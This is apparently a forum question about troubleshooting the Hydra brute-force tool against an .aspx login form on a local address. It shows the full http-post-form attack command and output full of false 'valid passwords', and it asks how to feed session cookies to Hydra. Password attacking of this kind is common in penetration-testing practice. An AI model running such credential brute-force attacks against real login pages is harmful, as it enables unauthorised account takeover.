I've been playing around with Hydra and .aspx site and I've hit a bit of a snag - Hydra responds letting me know that the first 16 passwords in my password list are correct when none of them are.
Syntax :
hydra 192.168.88.196 -l admin -P /root/lower http-post-form "/mmm/index.aspx:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."
Output
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2015-05-05 22:30:51
[DATA] 16 tasks, 1 server, 815 login tries (l:1/p:815), ~50 tries per task
[DATA] attacking service http-get-form on port 80
[80][www-form] host: 192.168.88.196 login: admin password: adrianna
[STATUS] attack finished for 192.168.88.196 (waiting for children to finish)
[80][www-form] host: 192.168.88.196 login: admin password: adrian
[80][www-form] host: 192.168.88.196 login: admin password: aerobics
[80][www-form] host: 192.168.88.196 login: admin password: academic
[80][www-form] host: 192.168.88.196 login: admin password: access
[80][www-form] host: 192.168.88.196 login: admin password: abc
[80][www-form] host: 192.168.88.196 login: admin password: admin
[80][www-form] host: 192.168.88.196 login: admin password: academia
[80][www-form] host: 192.168.88.196 login: admin password: albatross
[80][www-form] host: 192.168.88.196 login: admin password: alex
[80][www-form] host: 192.168.88.196 login: admin password: airplane
[80][www-form] host: 192.168.88.196 login: admin password: albany
[80][www-form] host: 192.168.88.196 login: admin password: ada
[80][www-form] host: 192.168.88.196 login: admin password: aaa
[80][www-form] host: 192.168.88.196 login: admin password: albert
[80][www-form] host: 192.168.88.196 login: admin password: alexander
1 of 1 target successfuly completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-05-05 22:30:51
I have read that we can add cookies to hydra okay: "H=Cookie: security;low;PHPSESSID=<value for PHP SESSID cookie"
- How do you get cookies from aspx?
- How do you provide it to hydra?